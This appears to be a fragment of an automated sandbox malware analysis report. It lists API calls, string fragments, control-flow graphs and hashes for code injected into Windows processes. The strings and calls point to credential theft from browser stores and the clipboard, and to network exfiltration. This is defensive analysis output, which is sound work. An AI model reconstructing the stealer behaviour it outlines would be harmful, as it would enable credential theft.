                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                				}
                                                                				_push(_t10);
                                                                				_push(_t15);
                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                				return E016B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                			}











                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016BFDFA
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016BFE01
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016BFE2B
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                • API String ID: 885266447-3903918235
                                                                • Opcode ID: a94b4ae3efa4aa942f7a996a221185dbeef3a545bd5e26f1d8bbdea9500b5b4d
                                                                • Instruction ID: f953a75abab84bd5648f5257beb2f420212c023a173cc5aea62bd82349f8ecad
                                                                • Opcode Fuzzy Hash: a94b4ae3efa4aa942f7a996a221185dbeef3a545bd5e26f1d8bbdea9500b5b4d
                                                                • Instruction Fuzzy Hash: 48F0C272200602BBE6211A45DC42EB3BB6AEB45B30F240218F628561E1DA62B87087E4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:5.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:20.5%
                                                                Total number of Nodes:83
                                                                Total number of Limit Nodes:12

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: recv$Sleepgetaddrinfosetsockopt
                                                                • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                                • API String ID: 878647675-2045366144
                                                                • Opcode ID: 2fc16e85ac3816d950710393f1d4933702210f777e9550580e5846ffcb64c173
                                                                • Instruction ID: dbd50078a95ef33f8edbd6cba86490b10e81dacee33d73efa25b4446f0f7b3ec
                                                                • Opcode Fuzzy Hash: 2fc16e85ac3816d950710393f1d4933702210f777e9550580e5846ffcb64c173
                                                                • Instruction Fuzzy Hash: 66527175218B088BDB79EF2CD484BEAB7E1FB94306F54452DD89BC7242DE30A946CB41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 317 85d5e22-85d5e35 318 85d5e3b-85d5e43 317->318 319 85d5ec4-85d5ec9 317->319 318->319 320 85d5e45-85d5e4d 318->320 320->319 321 85d5e4f-85d5e57 320->321 321->319 322 85d5e59-85d5e61 321->322 322->319 323 85d5e63-85d5e6b 322->323 323->319 324 85d5e6d-85d5e75 323->324 324->319 325 85d5e77-85d5e7d OpenClipboard 324->325 325->319 326 85d5e7f-85d5e95 325->326 328 85d5eb9-85d5ec0 326->328 329 85d5e97-85d5ea3 326->329 328->319 329->328 332 85d5ea5-85d5eb1 call 85d5c02 329->332 332->328
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: ClipboardOpen
                                                                • String ID:
                                                                • API String ID: 2793039342-0
                                                                • Opcode ID: 973df683495c9b69cc4f22e00b491ac9707cdee606476c2557e59d26ce09cb4c
                                                                • Instruction ID: 375f3359d7b266fd5e5523325b9f5bd9725b2b22e68f3e9e0058aa907259f797
                                                                • Opcode Fuzzy Hash: 973df683495c9b69cc4f22e00b491ac9707cdee606476c2557e59d26ce09cb4c
                                                                • Instruction Fuzzy Hash: 9D110C30110B0A8FEB65BB2C808E7B562A5FB88207F5805FD9D0ACF1D5EB76C986C710
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,085D7E9B), ref: 085D7559
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: AgentObtainStringUser
                                                                • String ID: -Age$User$nt: $on.d$urlm
                                                                • API String ID: 2681117516-1987325725
                                                                • Opcode ID: d39db5116cbb94e920403d79280b132d67c6a1c700a78bc228144ed42e862d9f
                                                                • Instruction ID: e8b4bc31620d76072e5ab4b99e2a192ee104c5e786da324faf51c2e49b315727
                                                                • Opcode Fuzzy Hash: d39db5116cbb94e920403d79280b132d67c6a1c700a78bc228144ed42e862d9f
                                                                • Instruction Fuzzy Hash: 5F31A135A14B4D8BCF15EFA8C4846ED7BE1FB98206F40026AD84ED7240EE7486498795
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 215 85d9078-85d90b8 216 85d90ba-85d90dc call 85dbeb2 215->216 217 85d90e2-85d9105 connect 215->217 216->217
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: connect
                                                                • String ID: conn$ect
                                                                • API String ID: 1959786783-716201944
                                                                • Opcode ID: 2f1f238a26762bc532f6605c9fb5e3d2dc556284b7df9b3f133164816aab584b
                                                                • Instruction ID: eb420bd857e5b61b2b5fefa395c8e063a7d6f9485e3d6a97f4cdfe30b3d53298
                                                                • Opcode Fuzzy Hash: 2f1f238a26762bc532f6605c9fb5e3d2dc556284b7df9b3f133164816aab584b
                                                                • Instruction Fuzzy Hash: DC01963051C7088FCB94EF1CD088B54B7D1FB98321F1540BDD94ECB266CAB48885C781
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 220 85d9082-85d90b8 221 85d90ba-85d90dc call 85dbeb2 220->221 222 85d90e2-85d9105 connect 220->222 221->222
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: connect
                                                                • String ID: conn$ect
                                                                • API String ID: 1959786783-716201944
                                                                • Opcode ID: cdaf3b3c2e97a94ca456cc6e6ea0da62bcb1465e9dcd869cdceb4a5bda98711c
                                                                • Instruction ID: 29ba8c3698b847d36bb7c7b5e749028def7feaef9993417965e78a0c79f5b083
                                                                • Opcode Fuzzy Hash: cdaf3b3c2e97a94ca456cc6e6ea0da62bcb1465e9dcd869cdceb4a5bda98711c
                                                                • Instruction Fuzzy Hash: DD011270518A088FCB94EF5CD088B5577E0FB98321F1581BEA94DCB266CA74C985CBC1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 225 85d8f66-85d8f6d 226 85d8f6f-85d8f83 225->226 227 85d8f87-85d8fab 225->227 226->227 228 85d8fad-85d8fcf call 85dbeb2 227->228 229 85d8fd5-85d8ff0 WSAStartup 227->229 228->229
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID: WSAS$tart
                                                                • API String ID: 724789610-2426239465
                                                                • Opcode ID: 16461cc60b29d8018f9e38de3f094586ee10a68b833ed0071c2d0660bf92ce1e
                                                                • Instruction ID: 7e3237e3a456ec6c01ba1c7ef0779e0103817d47350b71d659364bf48474dd8e
                                                                • Opcode Fuzzy Hash: 16461cc60b29d8018f9e38de3f094586ee10a68b833ed0071c2d0660bf92ce1e
                                                                • Instruction Fuzzy Hash: 2601A1705086888FCB44EF18D048769BBE0FB44352F1541AED549CF266C7B48985CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 232 85d8f72-85d8fab 233 85d8fad-85d8fcf call 85dbeb2 232->233 234 85d8fd5-85d8ff0 WSAStartup 232->234 233->234
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID: WSAS$tart
                                                                • API String ID: 724789610-2426239465
                                                                • Opcode ID: 9d5a9a750f08fbb59027bc66c78a2b909847f8483f0a00d47cc0b8618f26ed63
                                                                • Instruction ID: d0a54423d9fc58905b82dc684504ff1ca09da522efdd87bf518b5213881dc54e
                                                                • Opcode Fuzzy Hash: 9d5a9a750f08fbb59027bc66c78a2b909847f8483f0a00d47cc0b8618f26ed63
                                                                • Instruction Fuzzy Hash: 3E014F70508A088FCB54EF1CD08CB6ABBE0FB58312F1582A9D54DCB365C7B489858B96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 237 85d8ed9-85d8f1a 238 85d8f1c-85d8f3e call 85dbeb2 237->238 239 85d8f44-85d8f65 socket 237->239 238->239
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID: sock
                                                                • API String ID: 98920635-2415254727
                                                                • Opcode ID: bb2d97aff8fad754eba022eccf7524fd0729aaadde3baaf81db75c0d81669fa5
                                                                • Instruction ID: 3550318b46d76437739ff2edf152a1b1b8030f6ff770eccaaf22fc328686bd24
                                                                • Opcode Fuzzy Hash: bb2d97aff8fad754eba022eccf7524fd0729aaadde3baaf81db75c0d81669fa5
                                                                • Instruction Fuzzy Hash: 5C112D705186088FCB84EF1CD088B55BBE0FB98321F5585BED98DCB266C774C985CB86
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 242 85d8ff2-85d9025 243 85d904f-85d9077 send 242->243 244 85d9027-85d9049 call 85dbeb2 242->244 244->243
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: send
                                                                • String ID: send
                                                                • API String ID: 2809346765-2809346765
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID: sock
                                                                • API String ID: 98920635-2415254727
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .dll$32.d$M$S$el32$kern$ll$p_JF$user
                                                                • API String ID: 0-1312245336
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                • API String ID: 0-1539916866
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                • API String ID: 0-2058692283
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                • API String ID: 0-2058692283
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: U$b$d$k$n$o
                                                                • API String ID: 0-1739295752
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .dll$cryp$dll$nss3$t32.
                                                                • API String ID: 0-1478216402
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .dll$cryp$dll$nss3$t32.
                                                                • API String ID: 0-1478216402
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                • API String ID: 0-1970020201
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -Age$User$nt: $on.d$urlm
                                                                • API String ID: 0-1987325725
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .dll$el32$h$kern
                                                                • API String ID: 0-4264704552
                                                                • Opcode ID: be2073997aa64e6b0719d8a7a610da43e0c7b4a9b3273338c33fc6554eb5d4ee
                                                                • Instruction ID: 968aad43abe2fbe1641d03802ebb6ac372418f584ec66ac99678eeb810b01b64
                                                                • Opcode Fuzzy Hash: be2073997aa64e6b0719d8a7a610da43e0c7b4a9b3273338c33fc6554eb5d4ee
                                                                • Instruction Fuzzy Hash: 07414D7461CB498FD799DF2888843AAB6E1FF98301F104B2E949AC7255DB70D585CB42
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:7.4%
                                                                Dynamic/Decrypted Code Coverage:1.5%
                                                                Signature Coverage:2.1%
                                                                Total number of Nodes:1098
                                                                Total number of Limit Nodes:136
34217->34220 34219->34214 34220->34217 34221 2c330d0 13 API calls 34220->34221 34221->34220 34222->33989 34224 2c3ab76 34223->34224 34226 2c3ac76 34223->34226 34225 2c37420 10 API calls 34224->34225 34224->34226 34225->34224 34226->34002 34227->34002 34228->34002 34230 2c30d25 34229->34230 34231 2c2b4a0 LdrLoadDll 34230->34231 34232 2c30d8a 34231->34232 34233 2c2b4a0 LdrLoadDll 34232->34233 34234 2c30dd8 34233->34234 34235 2c2e7d0 2 API calls 34234->34235 34236 2c30e1f 34235->34236 34237 2c30e26 34236->34237 34238 2c3acc0 3 API calls 34236->34238 34237->34008 34240 2c30e34 34238->34240 34239 2c30e3d 34239->34008 34240->34239 34241 2c2b4a0 LdrLoadDll 34240->34241 34243 2c30e8c 34241->34243 34242 2c3ab60 10 API calls 34242->34243 34243->34242 34245 2c30f11 34243->34245 34263 2c30440 34243->34263 34246 2c30f69 34245->34246 34274 2c307a0 34245->34274 34248 2c3e3d0 2 API calls 34246->34248 34249 2c30f70 34248->34249 34249->34008 34251 2c309f6 34250->34251 34261 2c30a01 34250->34261 34252 2c3e4b0 2 API calls 34251->34252 34252->34261 34253 2c30a17 34253->34010 34254 2c2e7d0 2 API calls 34254->34261 34255 2c30cd0 34256 2c30ce9 34255->34256 34257 2c3e3d0 2 API calls 34255->34257 34256->34010 34257->34256 34258 2c3ab60 10 API calls 34258->34261 34259 2c2b4a0 LdrLoadDll 34259->34261 34260 2c30440 11 API calls 34260->34261 34261->34253 34261->34254 34261->34255 34261->34258 34261->34259 34261->34260 34262 2c307a0 10 API calls 34261->34262 34262->34261 34264 2c30466 34263->34264 34265 2c37420 10 API calls 34264->34265 34266 2c304c2 34265->34266 34267 2c33770 10 API calls 34266->34267 34268 2c304cd 34267->34268 34270 2c30650 34268->34270 34272 2c304eb 34268->34272 34269 2c30635 34269->34243 34270->34269 34271 2c30310 11 API calls 34270->34271 34271->34270 34272->34269 34280 2c30310 34272->34280 34275 2c307c6 34274->34275 34276 2c37420 10 API calls 34275->34276 34277 2c30837 34276->34277 34278 2c33770 10 API calls 34277->34278 34279 2c30842 34278->34279 34279->34245 34281 
2c30326 34280->34281 34284 2c33be0 34281->34284 34283 2c3042e 34283->34272 34285 2c33c1d 34284->34285 34286 2c33ccd 34285->34286 34287 2c34bc0 11 API calls 34285->34287 34288 2c33c70 34285->34288 34286->34283 34287->34288 34289 2c33ca9 34288->34289 34290 2c3e3d0 LdrLoadDll RtlFreeHeap 34288->34290 34289->34283 34290->34289 34291->33810 34292->33822 34293->33820 34294->33813 34295 2c2ec0d 34296 2c37420 10 API calls 34295->34296 34297 2c2ebcf 34296->34297
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C332D1
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02C3330E
                                                                • FindClose.KERNELBASE(?), ref: 02C33319
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: e087d6266e537de7c3881d886d1f84b5cc3f088032b63820a1d25fb8ebf71d50
                                                                • Instruction ID: 5155279eb01dd50db1b21766e112be1ef3a36aae635218ab26028b03e7568681
                                                                • Opcode Fuzzy Hash: e087d6266e537de7c3881d886d1f84b5cc3f088032b63820a1d25fb8ebf71d50
                                                                • Instruction Fuzzy Hash: 9C3184B59002896BEB21DFA4CC81FEE77799F84704F144898E948A7180DB70AA85DBE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C332D1
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02C3330E
                                                                • FindClose.KERNELBASE(?), ref: 02C33319
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: 1deacab0ff5942a3dcf8cae9cc29e520d99c03fce7513b58c6128043ddb8d2ba
                                                                • Instruction ID: 398aacd27d71dffd6898a1d993d6f37ad933026b9fbea3eb4a47770d2ef9ee22
                                                                • Opcode Fuzzy Hash: 1deacab0ff5942a3dcf8cae9cc29e520d99c03fce7513b58c6128043ddb8d2ba
                                                                • Instruction Fuzzy Hash: FD3165B59002487BEB21EBA4CC85FEF777DDF84704F144998F948A7180DB70AA859BE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • NtClose.NTDLL(02C2E555,00000000,?,02C2E555,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02C3C985
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID: <sxU
                                                                • API String ID: 3535843008-837359753
                                                                • Opcode ID: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                • Instruction ID: a5f71027cf294b23632f4caaccaae1b725ac381e7b253be1d8b3fb3135129d76
                                                                • Opcode Fuzzy Hash: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                • Instruction Fuzzy Hash: A0E012762002146BD614EB98DC45ED77B69DF48760F418495BA1DAB741C131EA1187E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,02C217C4,00000004,00001000,00000000), ref: 02C3CA49
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                • Instruction ID: 01dd5fd4256fad62b09d66b69cffd7dc5be9bd0bb4fc1d3dfb4087655761f7c8
                                                                • Opcode Fuzzy Hash: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                • Instruction Fuzzy Hash: 9D011276200219ABCB18DF98DC45DEB77ADEF8C354F108559FA4D9B245C631F911CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • NtReadFile.NTDLL(02C37750,02C32C20,FFFFFFFF,02C37233,00000002,?,02C37750,00000002,02C37233,FFFFFFFF,02C32C20,02C37750,00000002,00000000), ref: 02C3C925
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
